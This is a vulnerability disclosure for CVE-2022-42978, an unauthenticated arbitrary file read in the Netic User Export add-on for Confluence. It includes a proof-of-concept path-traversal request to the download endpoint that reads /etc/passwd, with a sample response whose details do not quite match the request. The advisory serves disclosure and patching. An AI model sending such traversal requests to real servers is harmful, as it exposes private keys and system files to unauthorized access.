Headline
CVE-2022-42978: Unauthenticated Arbitrary File Read
In the Netic User Export add-on before 1.3.5 for Atlassian Confluence, authorization is mishandled. An unauthenticated attacker could access files on the remote system.
Vulnerability Type: Unauthenticated Arbitrary File Read
Vendor of Product: Atlassian Confluence
Affected Product Code Base: User Export for Confluence
Product Version: < 1.3.5
Description: The Netic User Export add-on before 1.3.5 for Atlassian Confluence has the functionality to generate a list of users in the application, and export it. During export, the HTTP request has a fileName parameter that accepts any file on the system (e.g., an SSH private key) to be downloaded.
Attack Vectors: Attacker could make an HTTP request to the affected endpoint and download any file from the system.
Attack Type: Remote
Endpoint: /plugins/servlet/confluenceuserexport/admin/download
Assigned CVE-ID: CVE-2022-42977, CVE-2022-42978
Steps To Reproduce
1. Issue a HTTP POST/GET request to the following endpoint: https://<confluence.example.com>/plugins/servlet/confluenceuserexport/admin/download?fileName=[file-path]
#PoC
[REQUEST]
GET /plugins/servlet/confluenceuserexport/admin/download?fileName=…/…/…/…/…/…/etc/passwd HTTP/1.1
Host: confluence.example.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
[RESPONSE]
HTTP/1.1 401
Set-Cookie: JSESSIONID=ABCDEFGHIJKLMNOPQRSTUVWYZ; Path=/; HttpOnly
WWW-Authenticate: OAuth realm="confluence.example.local"
Content-Disposition: attachment; filename=…/…/…/…/…/etc/os-release
Content-Type: text/html;charset=UTF-8
Content-Length: 407
Not AuthorizedNAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"